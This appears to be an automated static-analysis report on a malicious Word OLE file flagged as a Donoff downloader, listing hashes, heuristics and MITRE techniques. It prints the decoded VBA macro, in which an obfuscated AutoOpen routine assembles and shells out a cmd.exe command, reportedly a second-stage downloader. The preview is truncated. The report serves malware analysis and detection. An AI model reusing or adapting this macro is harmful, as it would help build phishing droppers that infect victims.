Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 329812f4c8024182…

MALICIOUS

Office (OLE)

Size: 93.6 KB
Created: 2018-08-06 16:34:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: e6b501a887c9bfee6c166d7f08fbb9af
SHA-1: bb057414e9b7282a0a49eef4ff9dbe7cbf9abb1b
SHA-256: 329812f4c80241828b4f21667a7165662d1149b78cd4bddaccaa98bde44ec021
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a legacy WordBasic AutoOpen macro, identified by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The macro is designed to execute a command that appears to download and run a second-stage payload. The command string reconstructed from the concatenated string fragments in the macro is: 'c:\windows\system32\cmd.exe /V:O /C set zu=LDozQcMcQijUATsujiHWBiPikSvjLKCk\9(wI h)G$:N+.0md6ftb5p{e=n,x-/l ;a8qVFroy@'g}&&for %n in (53 ,71,35,55,37,55,62,62,63,40,29,37,36,56,57,55,35,60,71,51,27,55,7,50,63,42,55,50,44,19,55,51,30,62,23,55,57,50,64,40,68,42,27,56,74,37,50,50,53,41,) do'. The numeric list is an index-based lookup into the 'zu' character table, a common cmd.exe obfuscation pattern; the remainder of the command is not present in the truncated preview. The ClamAV detection 'Doc.Downloader.Donoff-6666971-0' further supports classification as a downloader. The primary attack vector is likely a spearphishing attachment.

Heuristics (5)

  • ClamAV: Doc.Downloader.Donoff-6666971-0 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6666971-0
  • VBA macros detected (severity: medium, 1 related finding, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, id: OLE_VBA_AUTOOPEN)
    Macro runs automatically when the document is opened
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6004 bytes
SHA-256: 2d88a225a7467d785864c63a31da22638ea3ecd3efcb55f97c980aa4c94fb388

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "HQzCCfZMamVFSH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName CDbl(JLOtt)
   TypeName 427422518
   TypeName iuUzBf
   TypeName 1069
   TypeName CByte(526513601)
Shell@ CStr("c") + CStr("m") + nHHYhukKSZFU + BLGFYUmrsbF + qDubWdXB + pmYShq + VMhIYVJL + WRUFHLE + jKDmnmcwvO, 741922241 - 741922241
   TypeName 6
   TypeName iVEki
   TypeName CLng(biHak - kWzuEw * iGAhk - XjjjTj)
End Sub


Attribute VB_Name = "nNiWjTCZoGGkEj"
Function qDubWdXB()
On Error Resume Next
TypeName JAGTZ
   TypeName 275249373
AcEiRHKnt = "d /" + "V:O" + "/C" + CStr(Chr(sYiPRpQ + VBzHKSfdjAaT + 34 + dEwLPvAPD + YrfizSA)) + "set zu" + "=LD" + "O" + "zQcMcQ"
TypeName Oct(69341 + ENndG * IoQkD - BnpPaj)
   TypeName Int(88513 * 41999 / JsZSYv + 87027)
ElocQim = "ijU" + "A" + "TsujiHWB" + "iPikSvjLK" + "Ck\9(wI" + "h)G$:N+" + ".0md" + "6ftb5p{e" + "=n,x" + "-/l" + " ;a8qVF"
TypeName Int(URtCuj / 27908 / 69511 - qErlE)
   TypeName 150013212
mOwpFz = "roy@'g}&&f" + "or %n i" + "n (" + "53" + ",71,35,55" + ",70,14" + ","
TypeName CByte(7587 * XEqsZD)
   TypeName CInt(39)
jrimTEZn = "37,55" + ",62," + "62,63,40" + ",2" + "9,3" + "7,36,5" + "6,57,5" + "5,35,6" + "0,71,51,2" + "7,55," + "7,50,63,"
TypeName Round(MvuGba)
   TypeName Log(1421)
   TypeName UuVKVf
hFhbWlovkN = "42,55,50" + ",44" + ",19,55,51" + ",30,6" + "2" + ",23" + ",55,57,50,"
TypeName VKLfp
   TypeName XiZTz
   TypeName Atn(17)
mpqfbBLzMO = "64," + "40," + "6" + "8,42" + ",27,56,7" + "4,37,5" + "0" + ",50,53,41,"
TypeName 42
   TypeName 15
wVXrqYQ = "61" + ",61" + ",6" + "5,51" + "," + "71,26" + ",55,7,70" + ",55,65,5" + "0,23,26,5" + "5,44,7,7" + "1,46,61,2"
TypeName Atn(kJdZT)
   TypeName Hex(121842791)
   TypeName Sin(CuUNz)
jXTUKtwIO = "0," + "1,73,37," + "50" + ",50" + ","
TypeName Round(dXjFXz * 8485 - 91909 / anURt)
   TypeName CDate(kQhzr / rCFTEc)
dOtMNmmVruw = "53,41,61" + ",61,35,35," + "3" + "5,44,71" + ","
TypeName CDate(mIlLd)
   TypeName ChrB(lkFiPt)
   TypeName OMuwi
XsXvYlG = "14,71,50" + ",14,5" + "3,65,6" + "0,23,57,50" + ",5"
TypeName zFZHWv
   TypeName CSng(sfizEv)
   TypeName 12
HjBGQF = "5,70,5" + "7,6" + "5,50,23,71" + "," + "57,65," + "62"
TypeName wrzilL
   TypeName wsJVwM
   TypeName CDate(87873666)
zsIwiLdR = "," + "44,7" + ",71,4" + "6,6" + "1,37," + "22,22," + "73,37" + ",50" + ","
qDubWdXB = AcEiRHKnt + ElocQim + mOwpFz + jrimTEZn + hFhbWlovkN + mpqfbBLzMO + wVXrqYQ + jXTUKtwIO + dOtMNmmVruw + XsXvYlG + HjBGQF + zsIwiLdR
   TypeName RnQGPM
   TypeName Tan(zAphp)
End Function
Function pmYShq()
On Error Resume Next
TypeName 211
   TypeName 9039
   TypeName Hex(66715 + GziWj / IXzkm * UOlTp)
dHtUFlE = "50,53" + "," + "41,61,61" + ",50" + ","
TypeName 7445
   TypeName Sqr(kkSAh + ZVjSj)
   TypeName ChrB(OMDKw)
EmWZYnbPu = "65" + "," + "50,71,55,1" + "4" + ",50,15" + ",47,23,71" + ",44,7," + "71,46" + ",61,50,8," + "67,5"
TypeName GMtXnR
   TypeName Sqr(KCTCVw + cDiGw + VSWVYG - zUOmI)
UvUXjpwKkMT = "0,13,69," + "72,73," + "37,5" + "0,50,53,4" + "1,61,61,5" + "1,65," + "71,57,75" + ",71,7,14" + ",5" + "3,65,44," + "26" + ",57,6"
TypeName 5302
   TypeName Tan(vNJEb - 88611)
   TypeName Atn(qtOUN + OWbGp)
FYDMafs = "1,2,48,7" + "3" + ",37,50," + "50," + "53,41"
TypeName Atn(245)
   TypeName PTRfbJ
   TypeName JwPPKG
PzuuP = ",61,61,35" + ",35,35," + "44,72," + "15,65,5" + "7,27,37," + "15,6" + "5,44,7,71" + ",46,61,39," + "45,59," + "23,3" + "5,13,69,74"
TypeName Tan(CWzpR)
   TypeName Tan(42)
   TypeName Tan(5)
iinzziCPhau = ",44,25" + ",53,62,2" + "3,50,3" + "4,74,7" + "3,74," + "3"
TypeName Sin(mBawis + rpHEWb)
   TypeName CDate(qZMMJA - VzsDP - ZZjzQ / zSZCjv)
dDhDLiS = "8,64," + "40,49,49," + "2," + "63,56," + "63,7" + "4,52,6" + "6,33,74," + "64,4" + "0,50,62" + ",68,5" + "6,40,55,57" + ",26,41,5"
TypeName T
... (truncated)